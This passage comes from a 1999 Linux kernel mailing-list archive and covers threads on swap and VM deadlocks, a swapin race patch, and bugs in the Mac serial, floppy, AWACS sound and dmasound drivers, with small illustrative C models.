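 * Toy shared/exclusive lock: writers of file data take it shared,
 * truncate takes it exclusive.  The try_* functions return 1 on
 * success and 0 if the caller would have to wait.
 */
struct trunc_lock {
    int sharers;    /* number of write / page-out paths inside */
    int exclusive;  /* 1 while a truncate holds the lock */
};

static int trunc_lock_try_shared(struct trunc_lock *l)
{
    if (l->exclusive)
        return 0;
    l->sharers++;
    return 1;
}

static void trunc_lock_put_shared(struct trunc_lock *l)
{
    assert(l->sharers > 0);
    l->sharers--;
}

static int trunc_lock_try_exclusive(struct trunc_lock *l)
{
    if (l->exclusive || l->sharers > 0)
        return 0;
    l->exclusive = 1;
    return 1;
}

static void trunc_lock_put_exclusive(struct trunc_lock *l)
{
    assert(l->exclusive);
    l->exclusive = 0;
}
```

In this model a write() that recurses into page-out simply takes the shared
side a second time, so it cannot deadlock against itself the way it does on
a plain inode semaphore.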

>> 2) I have tested using PG_dirty from shrink_mmap and it is a
>> performance problem because it loses all locality of reference,
>> and because it forces shrink_mmap into a dual role, of freeing and
>> writing pages, which need separate tuning.

> Exactly. This is part of the complexity.

> The right solution (I _think_) is to conceptually always mark it PG_dirty
> in vmscan, and basically leave all the nasty cases to the filemap physical
> page scan. But in the simple cases (ie a swap-cached page that is only
> mapped by one process and doesn't have any other users), you'd start the
> IO "early".

The trouble is that when we come to do the physical IO, we really want
to cluster the IOs.  Doing the swap cache allocation from vmscan means
that we'll still be allocating virtually adjacent memory pages to
adjacent swap pages, but if we don't do the IO itself until
shrink_mmap(), we'll lose the IO clustering which we need for good
swapout performance.

--Stephen
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 51%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
@ 1999-01-09  2:34 64%                                           ` Andrea Arcangeli
  1999-01-09  9:30 63%                                             ` Stephen C. Tweedie
  1999-01-09 12:11 64%                                           ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-09  2:34 UTC (permalink / raw)
  To: Stephen C. Tweedie
  Cc: Linus Torvalds, Eric W. Biederman, Zlatko Calusic, Alan Cox,
	bredelin, linux-kernel, Rik van Riel, linux-mm

Hi Stephen!

On Sat, 9 Jan 1999, Stephen C. Tweedie wrote:

> deadlock.  The easiest way I can see of achieving something like this is
> to set current->flags |= PF_MEMALLOC while we hold the superblock lock,

Hmm, we must not prevent shrink_mmap() from running, so I think it is
plain wrong to set PF_MEMALLOC before calling __get_free_pages().  It
would be much cleaner to use GFP_ATOMIC to achieve the same effect, btw ;).

Now I am too tired to follow the other part of your email (I'll read
tomorrow, now it's time to sleep for me... ;).

I forgot to ask: do you have any comments about the FreeAfter() stuff? It
made sense to me (looking at page_io, if I remember well), but I have not
carefully reread it yet after Linus's comments on it.

Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-09  2:34 64%                                           ` Andrea Arcangeli
@ 1999-01-09  9:30 63%                                             ` Stephen C. Tweedie
  0 siblings, 0 replies; 200+ results
From: Stephen C. Tweedie @ 1999-01-09  9:30 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Stephen C. Tweedie, Linus Torvalds, Eric W. Biederman,
	Zlatko Calusic, Alan Cox, bredelin, linux-kernel, Rik van Riel,
	linux-mm

Hi,

On Sat, 9 Jan 1999 03:34:56 +0100 (CET), Andrea Arcangeli
<andrea@e-mind.com> said:

> Hi Stephen!
> On Sat, 9 Jan 1999, Stephen C. Tweedie wrote:

>> deadlock.  The easiest way I can see of achieving something like this is
>> to set current->flags |= PF_MEMALLOC while we hold the superblock lock,

> Hmm, we must not prevent shrink_mmap() from running, so I think it is
> plain wrong to set PF_MEMALLOC before calling __get_free_pages().  It
> would be much cleaner to use GFP_ATOMIC to achieve the same effect, btw ;).

No, there are about a squillion possible places where we might try to
allocate memory with the superblock lock; updating them all to make
the gfp parameter conditional is gross!

Anyway, the whole point of PF_MEMALLOC is that it says we are
currently in the middle of an operation which has subtle deadlock or
stack overflow semantics wrt allocations, so always try to make
allocations from the free list.  In this case, the number of such
allocations we expect is small, so this is reasonable.  And yes, using
a new flag as opposed to PF_MEMALLOC would allow us to continue to
shrink_mmap (and in fact also to unmap clean pages) while preventing
recursive IO.

--Stephen

^ permalink raw reply	[relevance 63%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  1999-01-09  2:34 64%                                           ` Andrea Arcangeli
@ 1999-01-09 12:11 64%                                           ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-09 12:11 UTC (permalink / raw)
  To: Stephen C. Tweedie
  Cc: Linus Torvalds, Eric W. Biederman, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Zlatko Calusic, Ben McCann,
	Alan Cox, bredelin, linux-kernel, Rik van Riel, linux-mm

On Sat, 9 Jan 1999, Stephen C. Tweedie wrote:

> couple of years at least: a large write() to a mmap()ed file can
> deadlock for a similar reason, but on the inode write lock instead of
> the superblock lock.

Right. Look at the Oops report I generated at deadlock time and you'll see
that my kernel deadlocked in filemap_write_page() on the inode semaphore. 

Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* [PATCH] Fix for swapin bug
@ 1999-01-13 17:43 59% Stephen C. Tweedie
  0 siblings, 0 replies; 200+ results
From: Stephen C. Tweedie @ 1999-01-13 17:43 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Stephen Tweedie, Alan Cox, linux-mm, linux-kernel, Bill Hawes

Hi,

In the swap readahead code, we correctly avoid trying to read in swap
pages which already have a swap count of zero.  However,
read_swap_cache_async() can block between this point and the
swap_duplicate(); there is no guarantee that the page on disk is still
in use by the time we come to perform the swap IO, so swap_duplicate()
can fail with messages like

	morn kernel: swap_duplicate at    44400: entry 00044400, unused page 

The reason we don't see the same problem in normal swapping is simply
that the mm semaphore prevents multiple threads from trying to swap the
same page in concurrently, so we always guarantee that the current pte's
reference to the swap page is still valid after read_swap_cache_async()
blocks.

The fix is to perform the swap_duplicate at the very top of
read_swap_cache_async(), before we have a chance to block.

--Stephen
----------------------------------------------------------------
--- mm/swap_state.c~	Tue Jan 12 17:04:49 1999
+++ mm/swap_state.c	Wed Jan 13 17:22:24 1999
@@ -283,7 +283,7 @@
 
 struct page * read_swap_cache_async(unsigned long entry, int wait)
 {
-	struct page *found_page, *new_page;
+	struct page *found_page = 0, *new_page;
 	unsigned long new_page_addr;
 	
 #ifdef DEBUG_SWAP
@@ -291,15 +291,20 @@
 	       entry, wait ? ", wait" : "");
 #endif
 	/*
+	 * Make sure the swap entry is still in use.
+	 */
+	if (!swap_duplicate(entry))	/* Account for the swap cache */
+		goto out;
+	/*
 	 * Look for the page in the swap cache.
 	 */
 	found_page = lookup_swap_cache(entry);
 	if (found_page)
-		goto out;
+		goto out_free_swap;
 
 	new_page_addr = __get_free_page(GFP_USER);
 	if (!new_page_addr)
-		goto out;	/* Out of memory */
+		goto out_free_swap;	/* Out of memory */
 	new_page = mem_map + MAP_NR(new_page_addr);
 
 	/*
@@ -308,11 +313,6 @@
 	found_page = lookup_swap_cache(entry);
 	if (found_page)
 		goto out_free_page;
-	/*
-	 * Make sure the swap entry is still in use.
-	 */
-	if (!swap_duplicate(entry))	/* Account for the swap cache */
-		goto out_free_page;
 	/* 
 	 * Add it to the swap cache and read its contents.
 	 */
@@ -330,6 +330,8 @@
 
 out_free_page:
 	__free_page(new_page);
+out_free_swap:
+	swap_free(entry);
 out:
 	return found_page;
 }
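
The ordering in the patch above can be tried out in a small userspace
model.  This is a sketch only: the arrays, the *_model function names and
the `blocker` callback (which stands in for "the task sleeps here and
someone else runs") are all assumptions made for illustration, not the
kernel's data structures.

```c
#include <assert.h>

#define NR_SWAP 8
static unsigned char swap_map[NR_SWAP];  /* use count per swap entry */
static int swap_cached[NR_SWAP];         /* 1 if entry is in the cache */

/* Take a reference; fails (returns 0) if the entry is already unused. */
static int swap_duplicate_model(unsigned long entry)
{
    if (entry >= NR_SWAP || swap_map[entry] == 0)
        return 0;
    swap_map[entry]++;
    return 1;
}

static void swap_free_model(unsigned long entry)
{
    assert(entry < NR_SWAP && swap_map[entry] > 0);
    swap_map[entry]--;
}

/* Example "racing task": drops its own reference while we sleep. */
static void drop_one_ref(unsigned long entry)
{
    swap_free_model(entry);
}

/*
 * Returns 1 if the entry ends up in the swap cache, 0 otherwise.
 * `blocker`, if non-NULL, runs at the point where the real code may sleep.
 */
static int read_swap_cache_model(unsigned long entry,
                                 void (*blocker)(unsigned long))
{
    if (!swap_duplicate_model(entry))   /* pin first, before any sleep */
        return 0;
    if (swap_cached[entry]) {
        swap_free_model(entry);         /* cache already has its own ref */
        return 1;
    }
    if (blocker)
        blocker(entry);                 /* stands in for the page allocation */
    if (swap_cached[entry]) {           /* someone added it while we slept */
        swap_free_model(entry);
        return 1;
    }
    swap_cached[entry] = 1;             /* our ref now belongs to the cache */
    return 1;
}
```

Because the reference is taken before the sleep, the other task dropping
its reference in the middle leaves the count at one rather than zero, and
the entry is still valid when it is added to the cache.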


^ permalink raw reply	[relevance 59%]

* Re: Pre-R5 installer, some bug fixes
@ 1999-01-13 19:42 64% Duncan Mak
  0 siblings, 0 replies; 200+ results
From: Duncan Mak @ 1999-01-13 19:42 UTC (permalink / raw)
  To: linuxppc-dev


> 3.  I couldn't get any of the rpms from biggi--I think the symlinks
> confuse the installer.  I ended up downloading the rpms to a local
> computer and ftp installing from that computer.  Without any symlinks
> in the path, the installer found the rpms.

well, would it be possible for someone at linuxppc.org to set up
ftp.linuxppc.org or dev.linuxppc.org with one big directory of RPMS
instead of a software dir with RPMS in categories? i like the categories
and all, but if that is what is keeping me from doing an ftp install,
well... i want ftp install.

thanks,

duncan.


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Bug in macserial.c
@ 1999-01-14 22:41 64% Benjamin Herrenschmidt
  0 siblings, 0 replies; 200+ results
From: Benjamin Herrenschmidt @ 1999-01-14 22:41 UTC (permalink / raw)
  To: linuxppc-dev, Paul Mackerras


I found at least one bug in macserial.c: info->timeout is never filled
in (it should be set from change_speed), so the timeout used in
wait_until_sent is just garbage.
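
For illustration only, here is one way such a timeout could be derived from
the line speed.  This is a sketch, not the macserial code: the function
name tx_timeout_ticks(), the MODEL_HZ tick rate and the exact formula
(FIFO drain time plus a little slack) are assumptions.

```c
#include <assert.h>

#define MODEL_HZ 100   /* assumed timer ticks per second */

/*
 * Time, in timer ticks, to drain a transmit FIFO of `fifo_size`
 * characters at `baud` bits per second with `bits_per_char` bits on
 * the wire per character (start + data + parity + stop), plus 1/50 s
 * of slack.  Returns 0 for a baud rate of 0 so callers can detect
 * "speed not set".
 */
static unsigned long tx_timeout_ticks(unsigned int fifo_size,
                                      unsigned int bits_per_char,
                                      unsigned long baud)
{
    if (baud == 0)
        return 0;
    return (fifo_size * bits_per_char * (unsigned long)MODEL_HZ) / baud
           + MODEL_HZ / 50;
}
```

Whatever the real formula is, the value would have to be recomputed each
time the speed changes, which is presumably why change_speed is the place
to fill it in.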

I'm fixing other things and looking for other bugs, I'll have a patch for
macserial.c available soon.


-- 
           E-Mail: <mailto:bh40@calva.net>
BenH.      Web   : <http://calvaweb.calvacom.fr/bh40/>






^ permalink raw reply	[relevance 64%]

* Re: floppy driver bug: write-protect
  1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
@ 1999-01-15  2:18 63% ` David A. Gatwood
  1999-01-15  3:30 64% ` Brad Midgley
  1999-01-15  3:31 64% ` Paul Mackerras
  2 siblings, 0 replies; 200+ results
From: David A. Gatwood @ 1999-01-15  2:18 UTC (permalink / raw)
  To: Brad Midgley; +Cc: linuxppc-dev


On Sun, 15 Nov 1998, Brad Midgley wrote:

> is this a known bug?
> 
> on intel linux, if you try to mount a write-protected floppy disk
> read-write, the mount succeeds but is demoted to read-only. 
> 
> the current pmac kernel will mount the disk read-write and will allow
> "writes" to the disk. the writes even appear to succeed and the mounted
> filesystem returns really strange results when you look at it (it's
> caching the "writes" and everything seems normal until uncached data has
> to be loaded from the disk!)
> 
> is it known how to query the drive for the write-protect status? does this
> problem affect any other removable media?

Wow, so you guys have that problem, too, eh?  MkLinux's floppy driver does
the same thing.  It's given me fits trying to find something in LinuxPPC
to demote it to read-only.  Guess that's why I didn't find anything!!!
:-)

If anybody figures out how to fix this (no doubt the same fix, roughly,
for both), please let me know.  I've gotten as far as forcing the device
read-only, but that flag is ignored by at least umsdos filesystem support,
not sure what else....  :-(


Later,
David

David A. Gatwood                         Visit globegate's internet
dgatwood@globegate.utm.edu                  talker, Deep Space 36
http://globegate.utm.edu                telnet globegate.utm.edu:9624

-----BEGIN GEEK CODE BLOCK-----
Version 3.1
GCS/CC/FA/H/L/MC/M/MU/PA/TW d-@ s:>- a-- C++ ++>$ UBLAS*++ ++>$
P+?>$ L++ +>$ !E--- W++ +>$ N++(++ +)>++ +$ !o? K-? !w--- !O
M++>$ !V-- PS+>$ !PE- Y+>$ PGP+>$ t++ +>$ 5+>++ ++$ !X- !R tv+>$
b++>$ !DI !D- G++(++ +)>$ e>++ ++ h--! r--- !y-
------END GEEK CODE BLOCK------



^ permalink raw reply	[relevance 63%]

* Re: floppy driver bug: write-protect
  1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
  1999-01-15  2:18 63% ` David A. Gatwood
@ 1999-01-15  3:30 64% ` Brad Midgley
  1999-01-15  3:31 64% ` Paul Mackerras
  2 siblings, 0 replies; 200+ results
From: Brad Midgley @ 1999-01-15  3:30 UTC (permalink / raw)
  To: linuxppc-dev


This message was stuck in a mail queue since november!! (it was my own
sysadmin's fault :)

so when I say the current pmac kernel I really mean the pmac kernel of
November 15, 1998. 

argh, i just checked and this bug is present in vger-pre5.

brad

> 
> is this a known bug?
> 
> on intel linux, if you try to mount a write-protected floppy disk
> read-write, the mount succeeds but is demoted to read-only. 
> 
> the current pmac kernel will mount the disk read-write and will allow
> "writes" to the disk. the writes even appear to succeed and the mounted
> filesystem returns really strange results when you look at it (it's
> caching the "writes" and everything seems normal until uncached data has
> to be loaded from the disk!)
> 
> is it known how to query the drive for the write-protect status? does this
> problem affect any other removable media?
> 
> brad
> 
> 



^ permalink raw reply	[relevance 64%]

* Re: floppy driver bug: write-protect
  1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
  1999-01-15  2:18 63% ` David A. Gatwood
  1999-01-15  3:30 64% ` Brad Midgley
@ 1999-01-15  3:31 64% ` Paul Mackerras
  1999-01-15 18:34 63%   ` David A. Gatwood
  2 siblings, 1 reply; 200+ results
From: Paul Mackerras @ 1999-01-15  3:31 UTC (permalink / raw)
  To: brad; +Cc: linuxppc-dev


Brad Midgley <brad@pht.com> wrote:

> is this a known bug?

well, I didn't know about it. :-)

> on intel linux, if you try to mount a write-protected floppy disk
> read-write, the mount succeeds but is demoted to read-only. 

Do you have access to an intel-linux box?  Could you do an strace on
the mount command on a write-protected floppy and see whether mount
does two mount system calls (the first failing with EROFS), or if it
does some other ioctl to check whether the disk is write-protected?
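
The first of those two possibilities, a read-write attempt that fails with
EROFS followed by a read-only retry, would look roughly like the sketch
below.  It is an assumption about how a mount program might behave, not a
trace of the real one: the callback type, the MODEL_RDONLY flag and both
example "drivers" are hypothetical, so that the logic can run without
touching a real device.

```c
#include <assert.h>
#include <errno.h>

#define MODEL_RDONLY 0x1   /* hypothetical stand-in for a read-only flag */

/* Hypothetical mount callback: 0 on success, -1 with errno set on failure. */
typedef int (*mount_fn)(const char *dev, const char *dir, unsigned long flags);

/*
 * Try a read-write mount first; if the driver reports EROFS, retry
 * read-only.  Returns the flags finally used, or -1 on failure.
 */
static long mount_with_ro_fallback(mount_fn do_mount,
                                   const char *dev, const char *dir)
{
    if (do_mount(dev, dir, 0) == 0)
        return 0;
    if (errno != EROFS)
        return -1;
    if (do_mount(dev, dir, MODEL_RDONLY) == 0)
        return MODEL_RDONLY;
    return -1;
}

/* Example driver: a write-protected disk refuses read-write mounts. */
static int write_protected_mount(const char *dev, const char *dir,
                                 unsigned long flags)
{
    (void)dev;
    (void)dir;
    if (!(flags & MODEL_RDONLY)) {
        errno = EROFS;
        return -1;
    }
    return 0;
}

/* Example driver: a writable disk accepts anything. */
static int writable_mount(const char *dev, const char *dir,
                          unsigned long flags)
{
    (void)dev;
    (void)dir;
    (void)flags;
    return 0;
}
```

If this is what happens on intel, the demotion only works when the driver
itself refuses the read-write open, which would point at the driver rather
than at mount.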

> the current pmac kernel will mount the disk read-write and will allow
> "writes" to the disk. the writes even appear to succeed and the mounted

OK, I need to check the write-protect status in the floppy_write
routine in swim3.c.

I have recently looked at the floppy driver source code in MkLinux,
which looks like it is derived from macos sources.  It looks like
there are a few tweaks which I need to do to the Linux/PPC driver.

Paul.


^ permalink raw reply	[relevance 64%]

* Re: floppy driver bug: write-protect
  1999-01-15  3:31 64% ` Paul Mackerras
@ 1999-01-15 18:34 63%   ` David A. Gatwood
  0 siblings, 0 replies; 200+ results
From: David A. Gatwood @ 1999-01-15 18:34 UTC (permalink / raw)
  To: Paul.Mackerras; +Cc: brad, linuxppc-dev


On Fri, 15 Jan 1999, Paul Mackerras wrote:

> OK, I need to check the write-protect status in the floppy_write
> routine in swim3.c.
> 
> I have recently looked at the floppy driver source code in MkLinux,
> which looks like it is derived from macos sources.  It looks like
> there are a few tweaks which I need to do to the Linux/PPC driver.

MkLinux's driver is based on a Copland driver with a Mach Driver
interwoven and some shim code.  Needs massive cleanup, but basically works
as long as you don't have more than one floppy drive.  Also a little
trouble with writing large chunks of data (not sure why).

Thanks for the info on how the write protect is supposed to work.  I put
some checks for write protect on write, but making the mount fail is a
much more logical solution.


Later,
David

David A. Gatwood                         Visit globegate's internet
dgatwood@globegate.utm.edu                  talker, Deep Space 36
http://globegate.utm.edu                telnet globegate.utm.edu:9624

-----BEGIN GEEK CODE BLOCK-----
Version 3.1
GCS/CC/FA/H/L/MC/M/MU/PA/TW d-@ s:>- a-- C++ ++>$ UBLAS*++ ++>$
P+?>$ L++ +>$ !E--- W++ +>$ N++(++ +)>++ +$ !o? K-? !w--- !O
M++>$ !V-- PS+>$ !PE- Y+>$ PGP+>$ t++ +>$ 5+>++ ++$ !X- !R tv+>$
b++>$ !DI !D- G++(++ +)>$ e>++ ++ h--! r--- !y-
------END GEEK CODE BLOCK------



^ permalink raw reply	[relevance 63%]

* Re: BUG: deadlock in swap lockmap handling
  @ 1999-01-18 22:24 64% ` Alan Cox
  0 siblings, 0 replies; 200+ results
From: Alan Cox @ 1999-01-18 22:24 UTC (permalink / raw)
  To: andrea; +Cc: Zlatko.Calusic, sct, torvalds, linux-mm, linux-kernel

> I think it will not harm too much because the window is not too big (but
> not small) and because usually one of the processes not yet deadlocked will
> generate IO and will wake up the deadlocked process too at I/O
> completion time. A very lazy ;) but at the same time obviously right

Take it from me - the scenario you give will cause deadlocks and problems.
There were other "generating an I/O would have cleaned up" type problems in
2.0.x < .35/6. They caused a lot of grief with installers where that 
I/O assumption is not true. Another classic case is large fsck's during
boot up.

So it's not just a trivial irrelevant fix.


^ permalink raw reply	[relevance 64%]

* Fwd: Inoffensive bug in mm/page_alloc.c
       [not found]     <990119214302.n0001113.ph@mail.clara.net>
@ 1999-01-27 23:55 59% ` Paul Hamshere
  1999-01-30  1:52 64%   ` Benjamin C.R. LaHaise
  0 siblings, 1 reply; 200+ results
From: Paul Hamshere @ 1999-01-27 23:55 UTC (permalink / raw)
  To: Linux-MM

Is this of any interest here?
Paul
------------------------------
Hi
I was trawling through the mm sources to try and understand how linux tracks the
use of pages of memory, how kmalloc and vmalloc work, and I think there is a bug
in the kernel (2.0) - it doesn't affect anything, only wastes a tiny amount of
memory....does anyone else think it looks wrong?
The problem is in free_area_init where it allocates the bitmaps - I think they
are twice the size they need to be.
The dodgy line is

            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i );

which I think should be 

            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i + 1);

because the bitmap refers to adjacent pages.
I've changed my kernel to the second line and it seems to work.
Paul


----------------------------------------------------

unsigned long free_area_init(unsigned long start_mem, unsigned long end_mem)
{
      mem_map_t * p;
      unsigned long mask = PAGE_MASK;
      int i;

      /*
       * select nr of pages we try to keep free for important stuff
       * with a minimum of 48 pages. This is totally arbitrary
       */
      i = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT+7);
      if (i < 24)
            i = 24;
      i += 24;   /* The limit for buffer pages in __get_free_pages is
                * decreased by 12+(i>>3) */
      min_free_pages = i;
      free_pages_low = i + (i>>1);
      free_pages_high = i + i;
      start_mem = init_swap_cache(start_mem, end_mem);
      mem_map = (mem_map_t *) start_mem;
      p = mem_map + MAP_NR(end_mem);
      start_mem = LONG_ALIGN((unsigned long) p);
      memset(mem_map, 0, start_mem - (unsigned long) mem_map);
      do {
            --p;
            p->flags = (1 << PG_DMA) | (1 << PG_reserved);
            p->map_nr = p - mem_map;
      } while (p > mem_map);

      for (i = 0 ; i < NR_MEM_LISTS ; i++) {
            unsigned long bitmap_size;
            init_mem_queue(free_area+i);
            mask += mask;
            end_mem = (end_mem + ~mask) & mask;
/* commented out because not correct ?? PH
            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i);
*/
            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i +1);
            bitmap_size = (bitmap_size + 7) >> 3;
            bitmap_size = LONG_ALIGN(bitmap_size);
            free_area[i].map = (unsigned int *) start_mem;
            memset((void *) start_mem, 0, bitmap_size);
            start_mem += bitmap_size;
      }
      return start_mem;
}
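
The size difference being discussed can be checked with a little
arithmetic.  The sketch below is a simplified model, not the kernel
function: the helper names and MODEL_PAGE_SHIFT are assumptions, and it
deliberately ignores the per-order rounding of end_mem that the loop above
performs.

```c
#include <assert.h>

#define MODEL_PAGE_SHIFT 12UL   /* assumes 4 KB pages */

/* Bytes needed for `bits` bits, rounded up to a multiple of sizeof(long). */
static unsigned long bitmap_bytes(unsigned long bits)
{
    unsigned long bytes = (bits + 7) >> 3;
    unsigned long align = sizeof(long);

    return (bytes + align - 1) & ~(align - 1);
}

/* One bit per block of 2^order pages (the original line). */
static unsigned long bits_per_block(unsigned long mem_bytes, unsigned int order)
{
    return mem_bytes >> (MODEL_PAGE_SHIFT + order);
}

/* One bit per buddy pair of such blocks (the proposed line). */
static unsigned long bits_per_pair(unsigned long mem_bytes, unsigned int order)
{
    return mem_bytes >> (MODEL_PAGE_SHIFT + order + 1);
}
```

For 64 MB of memory, order 0 needs 2048 bytes with the original line and
1024 bytes with the proposed one, and each higher order halves again, so
the total saving stays below a single page on a machine of that size.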




--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 59%]

* AWACS Bug
@ 1999-01-28 14:01 64% Russell Hires
  1999-02-02  4:53 64% ` Paul Mackerras
  0 siblings, 1 reply; 200+ results
From: Russell Hires @ 1999-01-28 14:01 UTC (permalink / raw)
  To: linuxppc-dev


For some reason AWACS is causing Linux to crash. Here's the error
message I get: AWACS: error, status 4f40da9. I have a G3/266, which I
bought in late November 1998. 64 MB RAM, 6MB VRAM, DVD-ROM, 4 G SCSI HD
that runs Linux on 1.5 G partition (which is, of course, divided up into
/usr and so on...)  using the 2.2pre9 kernel (final).

About my crashes: it seems to happen when I use BootX the Application,
and not BootX the Extension. Also, it happens when I try to backspace too
much at the prompt, or lately when I try to come out of X (using
AfterStep) back into the shell...I tried the user support list, and they
suggested that I ask the developers if they knew anything. So, do you
know what could be causing this, or how I should try to fix it?

Russell Hires



^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
@ 1999-01-28 19:03 62% Trevor Woerner
  0 siblings, 0 replies; 200+ results
From: Trevor Woerner @ 1999-01-28 19:03 UTC (permalink / raw)
  To: Russell Hires, LinuxPPC Developer, LinuxPPC Users


Hi Russell,

>it happens when I try to backspace too much
>at the prompt, or lately when I try to come out of X (using AfterStep)
>back into the shell...I tried the user support list, and they suggested
>that I ask the developers if they knew anything. So,
>Do you know of what could be causing this, or how I should try to fix
>it?

this is REALLY off the top of my head and just a suggestion. i have
no idea how the kernel works, or how the sound works, or how the kernel
interacts with the sound, so i have no clue how/if this'll work.

anyway, when you're in X why don't you try a:

    user# xset b off

(where "user#" is your prompt). i don't like a computer that beeps
and boops at me so i put this in my .xinitrc (or was it my .fvwm2rc?)
anyway, instead of beeping the console will flash (i.e. no beep)

xset takes a number of parameters (one of which is required to get the
mouse to track at a decent rate) to allow you to adjust a number of
things about your environment. one of the things you can change is the
bell setting. the command above turns the bell off.

give it a whirl, tell us what happens!

best regards,
    trevor woerner


------------------------------------------------------------

...and now, ladies and gentlemen, for your entertainment
   the band will play "Somewhere My Love Lies Sleeping"
   with a male chorus...

                             --- Groucho Marx



^ permalink raw reply	[relevance 62%]

* Re: Fwd: Inoffensive bug in mm/page_alloc.c
  1999-01-27 23:55 59% ` Fwd: Inoffensive bug in mm/page_alloc.c Paul Hamshere
@ 1999-01-30  1:52 64%   ` Benjamin C.R. LaHaise
  0 siblings, 0 replies; 200+ results
From: Benjamin C.R. LaHaise @ 1999-01-30  1:52 UTC (permalink / raw)
  To: Paul Hamshere; +Cc: Linux-MM

Hello Paul,

> Is this of any interest here?

Yep!

> Paul
> ------------------------------
> Hi
> I was trawling through the mm sources to try and understand how linux tracks the
> use of pages of memory, how kmalloc and vmalloc work, and I think there is a bug
> in the kernel (2.0) - it doesn't affect anything, only wastes a tiny amount of
> memory....does anyone else think it looks wrong?
> The problem is in free_area_init where it allocates the bitmaps - I think they
> are twice the size they need to be.

If you search the mailing list archives from either a year, maybe two ago,
someone brought forth the same concern, but Linus rejected the patch on
the basis that it wasn't trivially proven correct for *all* sizes of
memory.  The amount of memory involved is insignificant, and I'd speculate
that we'll see a page allocator in 2.3 at which point that loss can
disappear.

		-ben (cleaning out the inbox)


^ permalink raw reply	[relevance 64%]

* bug in arch/ppc/mm/init.c
@ 1999-01-30 15:05 64% Loic Prylli
  1999-03-03  5:19 64% ` Paul Mackerras
  0 siblings, 1 reply; 200+ results
From: Loic Prylli @ 1999-01-30 15:05 UTC (permalink / raw)
  To: linuxppc-dev



Hello,

The init functions of some drivers use ioremap, which may call
MMU_get_page (if the target zone crosses a 4 Mbyte boundary). But
MMU_get_page is marked as an initfunc, so it is no longer present once
the init memory has been freed -> panic.


Here is one possible solution:

--- arch/ppc/mm/init.c~ Thu Jan  7 21:06:57 1999
+++ arch/ppc/mm/init.c  Sat Jan 30 16:01:17 1999
@@ -883,7 +883,7 @@
        }           
 }
 
-__initfunc(static void *MMU_get_page(void))
+static void *MMU_get_page(void)
 {
        void *p;
 


^ permalink raw reply	[relevance 64%]

* BUG in dmasound.c, allocating buffers
@ 1999-01-31 20:21 60% Scott Sams
  0 siblings, 0 replies; 200+ results
From: Scott Sams @ 1999-01-31 20:21 UTC (permalink / raw)
  To: linuxppc-dev


Hi,

I am running linux-2.2.0 and I noticed that the kernel crashed 4 times
in one day when I was playing mp3s (mpg123-p, gqmpeg-0.4.5), always when
a new song was going to be played, and usually after 30 minutes of
continuous play. There was absolutely no warning message on the screen
or in the logs, just the entire system froze, with the exception of the
console cursor appearing and blinking in the upper left corner of the
screen.

This got me digging into dmasound.c and looking at the cvs log. The last
version I used, this problem did not occur. This was linux-2.1.125 using
dmasound.c version 1.29. Since then, there have been several updates,
notably 1.33:

>Patch from Jes/Andreas to make it only allocate buffers when opened.

I think that the bug must lie in there, maybe in the sq_allocate_buffers
or sq_release_buffers functions.

I also saw a patch, 1.37, which said it fixed a couple of bugs that let
the user crash the kernel. I applied these by hand to my version of
dmasound.c, just to be safe, but the same crash happened later.

I don't have the knowledge to fix this bug, but I'll bet if someone who
is knowledgeable looked over the code I have isolated, they will find out
what is going on.

At the very least, someone can insert some debugging output that may
help discover the problem. I will be glad to test anything.

Thanks,

Scott Sams

-- 
 ____ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      Scott Sams         
(____  _  _-|-|-                    sbsams@eos.ncsu.edu      
_____)(__(_)| |        http://www.catt.ncsu.edu/~sbsams
~~~~~~~~~~~~~~~~


^ permalink raw reply	[relevance 60%]

* Re: AWACS Bug
  1999-01-28 14:01 64% AWACS Bug Russell Hires
@ 1999-02-02  4:53 64% ` Paul Mackerras
  0 siblings, 0 replies; 200+ results
From: Paul Mackerras @ 1999-02-02  4:53 UTC (permalink / raw)
  To: inet2; +Cc: linuxppc-dev


Russell Hires <inet2@akos.net> wrote:

> For some reason AWACS is causing Linux to crash. Here's the error
> message I get: AWACS: error, status 4f40da9. I have a G3/266, which I
> bought in late November 1998. 64 MB RAM, 6MB VRAM, DVD-ROM, 4 G SCSI HD
> that runs Linux on 1.5 G partition (which is, of course, divided up into
> /usr and so on...)  using the 2.2pre9 kernel (final).
> 
> About my crashes: it seems to happen when I use BootX the Application,
> and not
> BootX the Extension. Also, it happens when I try to backspace too much

